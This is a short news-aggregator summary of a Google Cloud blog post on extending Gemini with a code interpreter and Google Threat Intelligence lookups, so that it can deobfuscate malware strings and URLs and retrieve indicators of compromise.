A naukri.com initiative
Cloudblog
1M
304
Image Credit: Cloudblog
Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence
- Google Cloud has provided its malware analyst tool, Gemini, with new tools to help automate obfuscation techniques and gain real-time indicators of compromise insights (IOC) through the integration of Code Interpreter and Google Threat Intelligence.
- Code Interpreter provides Gemini with tools to create and execute code to decode specific elements of malware, such as strings encoded by XOR algorithms. It aims to minimise human intervention as a result of misinterpretations.
- GTI function calling aims to expand Gemini's horizons by retrieving contextualised information from Google Threat Intelligence on suspicious external resources — insights verified, not guessed.
- The challenge for malware analysts is that developers use obfuscation tactics to conceal the IOCs and underlying logic, and malware often downloads additional malicious codes, making it difficult to understand the sample's behaviour.
- These tools have the potential to enhance the understanding of the behaviour of malware by decoding obfuscated elements and providing context, which will lead to an improvement in threat mitigation.
- The integration of these tools has helped Gemini identify that a PowerShell script contains an obfuscated URL in an autonomous manner and deobfuscate it without any human intervention. This demystified URL is then used to query Google Threat Intelligence and obtain additional context on the URLs, IPs, and domains related to the malware sample.
- Further enhancements will continue to develop Gemini's autonomy and adaptive approach to operate through complex samples, enabling users to understand the behaviour of various types of malware effectively.
- Google Cloud is committed to empowering the cybersecurity community with modern tools, and updates will aim to enhance the Gemini tool's capabilities, moving it closer to a more autonomous and adaptive approach in threat intelligence automation.
Read Full Article
18 Likes
For uninterrupted reading, download the app